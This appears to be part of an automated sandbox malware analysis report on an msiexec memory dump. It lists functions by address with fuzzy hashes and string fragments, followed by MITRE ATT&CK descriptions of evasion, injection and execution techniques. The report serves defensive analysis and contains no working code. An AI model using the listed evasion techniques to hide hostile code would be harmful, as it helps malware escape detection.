Opcode Fuzzy Hash: f39137fc9f04cc262678fddfb487be95fec42301451ddf36af21b88ef8a0769a
Instruction Fuzzy Hash: D941C1307442198FDB15AB3988A8B3E7AA7AFC4344F14846AE506CB396DF78DC45CB91

Function 02E9418F Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84158aa5df19504d6c84d8225fb05fb8d37e9c79a58d2d4d5bbdf255178ff5db
Instruction ID: 8ddb9308203cde1bde5b8f6e4b7ff9aeca4eb2a7fe10cef6449f36e974251c7c
Opcode Fuzzy Hash: 84158aa5df19504d6c84d8225fb05fb8d37e9c79a58d2d4d5bbdf255178ff5db
Instruction Fuzzy Hash: 2851A174E41208DFCB08DFA9D59099DBBF2FF89310B209069E809AB365DB35AD46CF50

Function 02E9D548 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51d8a651757c2440c1fdbd1814eb081ea234dc1390887a53114ac16c86fe0341
Instruction ID: 5d8de5bcba67d7feda8ad120dade8e41d511a95888ad0f672aab866700132e39
Opcode Fuzzy Hash: 51d8a651757c2440c1fdbd1814eb081ea234dc1390887a53114ac16c86fe0341
Instruction Fuzzy Hash: D2518474E01218DFDB44DFAAD98499DBBF2BF89300F209169E919AB365DB30A905CF50

Function 02E941A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fc11afcefddd865b527b4fe9c8272a2c8072438c39a69958c296a8a294ec875
Instruction ID: 3719be1fcd1a175de999c07c527fb5ec95298f9b0ddfb14499677294f8dee700
Opcode Fuzzy Hash: 1fc11afcefddd865b527b4fe9c8272a2c8072438c39a69958c296a8a294ec875
Instruction Fuzzy Hash: 58518074E41208DFCB08DFA9D59499DBBF2FF89310B209169E909AB364DB35AD42CF50

Function 02E9D558 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fddb9b3ee8285c516009f2bed6b343819563610382aa12b0c2fcb68c992042b4
Instruction ID: 3d5b305cece096aa2a984e9e251228bf3f83a4662e6be6e9e13a43c585d869b3
Opcode Fuzzy Hash: fddb9b3ee8285c516009f2bed6b343819563610382aa12b0c2fcb68c992042b4
Instruction Fuzzy Hash: 26518474E01218DFDB44DFAAD58499DBBF2BF89300F209169E819AB364DB309845CF50

Function 02E95658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eee7e0270b4e21a36023c055e24cad850b21d5f9efdd5768934865510df7ba6d
Instruction ID: bf881b3abdacdf234a293f92594b376a81b89a821eeb1228ae2f2462f36ae81e
Opcode Fuzzy Hash: eee7e0270b4e21a36023c055e24cad850b21d5f9efdd5768934865510df7ba6d
Instruction Fuzzy Hash: CD319E3124020DDFCF169F68C898AAE3BB3FB88315F509465F91687245CB79DD25CB90

Function 02E9AF00 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85e20a97c68b7cc48cb89790ec212af52a0282ea94ac852fd0cb038d7fad74d4
Instruction ID: 517f1cd4bca8dbadda76fb6a25653fea9d7148352fe9eb8035f6388364456a4f
Opcode Fuzzy Hash: 85e20a97c68b7cc48cb89790ec212af52a0282ea94ac852fd0cb038d7fad74d4
Instruction Fuzzy Hash: C9319472B102189FCB059B69C858BAEBBB7EFC8311F14906AE916D7390DE75AC05C790

Function 02E9AEF0 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 405de01ff0620501772261dc7fadec0259ff48f68b3f34528ae2287fd75ad686
Instruction ID: d6ad536517ef8e717f0f380fed3ef6a0cbd63636fa3d748de11aeaa71f1f839f
Opcode Fuzzy Hash: 405de01ff0620501772261dc7fadec0259ff48f68b3f34528ae2287fd75ad686
Instruction Fuzzy Hash: A0214F32B502089BCB149E59DC48AEEB7BAFF8C321F14902AE516A7350DA75AC14CB90

Function 02E928E0 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b05c364d90a559de7442d3a9f0083fe54b89fdb639a4ae357cf16abe61b000ea
Instruction ID: 741aff502c48d9e843a7277a71d6bd5d24ab487fdb0432cf756d85d5f88d274e
Opcode Fuzzy Hash: b05c364d90a559de7442d3a9f0083fe54b89fdb639a4ae357cf16abe61b000ea
Instruction Fuzzy Hash: A7219C75E00205AFCF55CB34C590AFE77A5EB9D224B20C05AD9099B264DB34EE46CBD1

Function 02E962F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4197398de1242aea388155b92a09091b44768008f5277ef497f7ab2dd5016209
Instruction ID: 5be1443279cce3b07d022f91d434cdc4725c890bbb3be9257708d0b914de73b6
Opcode Fuzzy Hash: 4197398de1242aea388155b92a09091b44768008f5277ef497f7ab2dd5016209
Instruction Fuzzy Hash: E021D0357416158FCB159A29C46892EB7A7EFC9755714907BE816CB398CF34DC02CB80

Function 02E95649 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1fd531a3b174e666c0b3a43824831aabc9a15c8cbe310a4cc6e2f3f7b81076d
Instruction ID: 8e43a3c7a595a4cff6be847e95695612d3ea39568ea83398fb81e2c82b4c7e30
Opcode Fuzzy Hash: d1fd531a3b174e666c0b3a43824831aabc9a15c8cbe310a4cc6e2f3f7b81076d
Instruction Fuzzy Hash: 1C21233164520DDFCF069F68C858BAA3BA3EF88315F609466F9068B245CB78DD15CF90

Function 02E96300 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a96404db807f0dc6fe4c96b711051dbc428f2c8a2a1b7d30fe344264fe2dfed4
Instruction ID: 2fe194594919e3d7af0ee50ab28ed7287ebfefcc8a117c36bba1f0b8776fa441
Opcode Fuzzy Hash: a96404db807f0dc6fe4c96b711051dbc428f2c8a2a1b7d30fe344264fe2dfed4
Instruction Fuzzy Hash: 2011E5353416159FCB199A2AC45892E77ABFFC57A5318807AE817CB364CF30EC02CB90

Function 02E9F640 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a53afcee90084511b0357e784e70d4f508b6b863446fac4aec7ecdf0b551204
Instruction ID: 123f1aa4f77b01f6dec7d48b64c0b966084ccb5c7782d80fea3aa94b720b5e23
Opcode Fuzzy Hash: 2a53afcee90084511b0357e784e70d4f508b6b863446fac4aec7ecdf0b551204
Instruction Fuzzy Hash: B821C0B0D4024ACFCB01DFA9C55468EBFB3FF41304F10D5AAD1549B2A5E7345906CB80

Function 02E9F650 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf22bb61c4924e87002c0ec87780ec93954b7223daef03178229e0ec86e5b010
Instruction ID: 009d78fa7d1f40903d0d7fceb7b9d012f5625d81eef126f18622faadf08fdd9b
Opcode Fuzzy Hash: cf22bb61c4924e87002c0ec87780ec93954b7223daef03178229e0ec86e5b010
Instruction Fuzzy Hash: 74113AB0D4020EDFCB00EFA9C55069EBFF2FB44304F10D5A9D1189B268EB746A498B81

Function 02E927F0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d3f9414a32944d1e3fe914e81d09ba45a2c9ef2ac16321de3053f4a44facc3d
Instruction ID: 8320e753c9370f7f1eacc5a35c429bb3cfaa3823f2df7c1480501dc1f241b2c1
Opcode Fuzzy Hash: 7d3f9414a32944d1e3fe914e81d09ba45a2c9ef2ac16321de3053f4a44facc3d
Instruction Fuzzy Hash: DF21AF74D5120D8FCF40EFA9C9496EEBBF5FB49300F10516AD819B2210EB346A95CBA1

Function 02E92800 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cc7b2b3602b70167340aa0570dcc82052e347f9a9a250f2e30363ad8d92edfd
Instruction ID: 5bb66fd241f51a6eeb5ddb368a20f06dc7f5b0ed65688e9b005b5820024b6c8d
Opcode Fuzzy Hash: 0cc7b2b3602b70167340aa0570dcc82052e347f9a9a250f2e30363ad8d92edfd
Instruction Fuzzy Hash: 1E119274D1020D8FCF40EFA9C9485EEBBF5FB49300F10516AD919B2210EB346A95CBA1

Function 02E95EA8 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 728ca6f6e9d85e64a7ba8dab42ff351d4f2701286550d23d3a1e64cdcd57a5e4
Instruction ID: 07d6a4763e7d8d4309bf6410af06dbacbf6870c79989cac61daf8db390e9bb67
Opcode Fuzzy Hash: 728ca6f6e9d85e64a7ba8dab42ff351d4f2701286550d23d3a1e64cdcd57a5e4
Instruction Fuzzy Hash: 13012B3274011DAB8F029E988804AAF3BEBDBC8750F54C026F905D3240CE729C158B90

Function 02E95E98 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad639eb37f0fd5f637d76bfa8ba93f83a91132da83fd78a2f277937fcf9c77d7
Instruction ID: 810dbc32c50101cc151bcbcc33c472e6a436a5a5707995d4778e483acd3c9397
Opcode Fuzzy Hash: ad639eb37f0fd5f637d76bfa8ba93f83a91132da83fd78a2f277937fcf9c77d7
Instruction Fuzzy Hash: 1501D133640219ABCB02DE999C44BDF3BABEBC8351F18C026F915C7180DA76DC169B90

Function 02E9E8E8 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d83e3ed603dd883ac62e109ff47d79d37e019809379230f5a0f503609c50d5c
Instruction ID: 7ba4693b2dd49a0d1bf4a818c80a847daf1a7e6847e840e2ab05d181314f9e0e
Opcode Fuzzy Hash: 4d83e3ed603dd883ac62e109ff47d79d37e019809379230f5a0f503609c50d5c
Instruction Fuzzy Hash: 3C015E74D4020AEFCF01DFA9D854AAEBBB2FB89300F408526DA14A3350D7395E56CF91

Function 02E928A3 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd967d15f5b55357d0fdf333ccca649741c3098654e0174fcb98eceeb1e2e8b5
Instruction ID: befeafc3aa7ebc6ec71ef649804b0fc521159a23681b8f5748edbac5cbf90201
Opcode Fuzzy Hash: fd967d15f5b55357d0fdf333ccca649741c3098654e0174fcb98eceeb1e2e8b5
Instruction Fuzzy Hash: B0E0C276D3066686CB02D7A0ED056EDF739EF86251F584666C42077454EB345268C3A0

Function 02E96739 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bca686dfb7efc0ea9c16ad037fe6c156edfdc0b23b403b8dda2d5cbd9f2a2d1
Instruction ID: 2f1915d3f08119194f4aac0507537b768b9b7285f9943a1c646a7c7b1d14e816
Opcode Fuzzy Hash: 4bca686dfb7efc0ea9c16ad037fe6c156edfdc0b23b403b8dda2d5cbd9f2a2d1
Instruction Fuzzy Hash: 56D017322A435E4AD706E778DD5AB5D3B2BE7C4310F68A170B1054B19BDFB8A80E46A0

Function 02E9D6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80b12e11ca990d2d7d53dda4e1bd8890cbb636b485ea1fedb001e455fe39ea08
Instruction ID: 5b9990eb9df3d37e6f701208fc40326218c6e7e8a2e8a7fb9c6850a5683a52af
Opcode Fuzzy Hash: 80b12e11ca990d2d7d53dda4e1bd8890cbb636b485ea1fedb001e455fe39ea08
Instruction Fuzzy Hash: CAD0E239E4000CCBCF20DFA8E4888DCBB71EB48321B14502AD926A3251CA742850CF01

Function 02E9AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1cf812e455d83be5d6082d9b8ba2936c872c8e428f49668e31edbec05958e40
Instruction ID: 7e8cf324959141f09c7f36cdb0d606f6b1e26e0ab67a47f1b3453ee330b889e9
Opcode Fuzzy Hash: a1cf812e455d83be5d6082d9b8ba2936c872c8e428f49668e31edbec05958e40
Instruction Fuzzy Hash: BFD0673AB40018AFCB049F9CE884CEDF776FB98321B048127E915A3261C631A925DB50

Function 02E96748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbd5ead50adc1543a2865031979589c396a20bd2a73f654fbf752bedc912ae58
Instruction ID: d12e386d91a2c7913bb3d4a7dcf02a13f1fb951b2c1c0590d3a051f33eb3274f
Opcode Fuzzy Hash: bbd5ead50adc1543a2865031979589c396a20bd2a73f654fbf752bedc912ae58
Instruction Fuzzy Hash: 00C0123015031E4ED645EB79DD55A193B1BF7C0304750A570B5050A55EDFB82C4E4A90

Non-executed Functions

Function 02E97118 Relevance: 5.3, Strings: 4, Instructions: 349COMMON

Download Yara Rule

Strings

(olq, xrefs: 02E97220
,pq, xrefs: 02E97298
,pq, xrefs: 02E9728A
(olq, xrefs: 02E97212

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID: (olq$(olq$,pq$,pq
API String ID: 0-2163561314
Opcode ID: 94dd36e741ab7468a5c3b978f173f4208e16a1f731d4edf70b78ddfb01e3fee3
Instruction ID: f2866af952238f78b21f200c5085d047756222df1f50c3dc0e51f762fdb71371
Opcode Fuzzy Hash: 94dd36e741ab7468a5c3b978f173f4208e16a1f731d4edf70b78ddfb01e3fee3
Instruction Fuzzy Hash: CEE119B0A60119DFCF14CFA9C984AADFBB2BF89348F55D066E805AB265D730EC45CB50

Function 02E9F2C0 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b360f2ee9fdd86e078e69aa0dfdbd52355be122833ceca6e6720efbbbca1dc0
Instruction ID: 19fceca88f5946a5bc5702163af9f91fd0a41e0056cafd06cda1911d08305a9c
Opcode Fuzzy Hash: 0b360f2ee9fdd86e078e69aa0dfdbd52355be122833ceca6e6720efbbbca1dc0
Instruction Fuzzy Hash: 86511670D81208DBDF04EFA9C9947DEBBB2BB8A304F54E12AD404AB694D7799881CF54

Function 02E9F4AC Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3cc6a28541b8331961050d8a867bb3d0c3f3a7808e265ded60ebd84d2d950f1
Instruction ID: d3c4be917af60b2f4cea4b2e9c4bcc50a0a3362cf4fd6ed7f9b3e1e0b5b1d09c
Opcode Fuzzy Hash: d3cc6a28541b8331961050d8a867bb3d0c3f3a7808e265ded60ebd84d2d950f1
Instruction Fuzzy Hash: 67510270D81208CFDF14EFA9C494BEDBBB2BB4A304F64E11AD419AB694C7799881CF50

Function 02E976F1 Relevance: 10.5, Strings: 8, Instructions: 472COMMON

Download Yara Rule

Strings

,pq, xrefs: 02E97BA0
(olq, xrefs: 02E97BFF
(olq, xrefs: 02E97C0F
(olq, xrefs: 02E978B2
,pq, xrefs: 02E97B90
(olq, xrefs: 02E97815
(olq, xrefs: 02E977E9
(olq, xrefs: 02E9772E

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID: (olq$(olq$(olq$(olq$(olq$(olq$,pq$,pq
API String ID: 0-3995173875
Opcode ID: 7a167feff9dd88e2a64c2a06144cdd6019b2a72fd4daa3461847dbf58889f399
Instruction ID: c68e937e9f7043d976ff9c82a1d1143d7b514452a2cbfd506887f13c89736895
Opcode Fuzzy Hash: 7a167feff9dd88e2a64c2a06144cdd6019b2a72fd4daa3461847dbf58889f399
Instruction Fuzzy Hash: 3B124970A502099FCF24CF68C994AAEBBF2FF88318F14955AE8159B365D730ED49CB50

Function 02E929D0 Relevance: 5.1, Strings: 4, Instructions: 148COMMON

Download Yara Rule

Strings

Xpq, xrefs: 02E92A9E
Xpq, xrefs: 02E92BA4
Xpq, xrefs: 02E92B57
Xpq, xrefs: 02E92AD8

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID: Xpq$Xpq$Xpq$Xpq
API String ID: 0-3581616602
Opcode ID: c2fba81e997b9ee1499feef71f2a4fab1f3513a5a92184afdfa3250e318e300c
Instruction ID: d7c2c7acf9afead223931ffa2d888afafc2629ce7ac998b18efd159da13d4ef7
Opcode Fuzzy Hash: c2fba81e997b9ee1499feef71f2a4fab1f3513a5a92184afdfa3250e318e300c
Instruction Fuzzy Hash: A5519D72E4031A9BCF64CFA988907AEBBF5AF88304F249166C915B7254EB309945CB91

Function 02E92A78 Relevance: 5.1, Strings: 4, Instructions: 137COMMON

Download Yara Rule

Strings

Xpq, xrefs: 02E92A9E
Xpq, xrefs: 02E92BA4
Xpq, xrefs: 02E92B57
Xpq, xrefs: 02E92AD8

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID: Xpq$Xpq$Xpq$Xpq
API String ID: 0-3581616602
Opcode ID: 49330334801e0d83796f51c2b12acc82bed2dd7e5794cb16db5d0361ffca4234
Instruction ID: 3604641ecfa114e74cfcccad2231d438ba257fa6c51dcd1c8556c2b07f673b6a
Opcode Fuzzy Hash: 49330334801e0d83796f51c2b12acc82bed2dd7e5794cb16db5d0361ffca4234
Instruction Fuzzy Hash: C151D731E443299BDF749F78895037EBBB6BB84314F1094A6C909A7395EF708D84CB92

Function 02E96920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;lq, xrefs: 02E9692C
\;lq, xrefs: 02E9695E
\;lq, xrefs: 02E96952
\;lq, xrefs: 02E96936

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID: \;lq$\;lq$\;lq$\;lq
API String ID: 0-1975028600
Opcode ID: c9a71840d541b2e45e9360110822ac3c793086b83d3b774287db71f5cf1368a6
Instruction ID: 56696952b90ef319694834209a6075ef7049127c14dc60cce9cd938b6c351314
Opcode Fuzzy Hash: c9a71840d541b2e45e9360110822ac3c793086b83d3b774287db71f5cf1368a6
Instruction Fuzzy Hash: 77014B317802158FCF289E2DC644A6A77EAEF98A68725D16BE405CB3B4DB31EC41C791

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

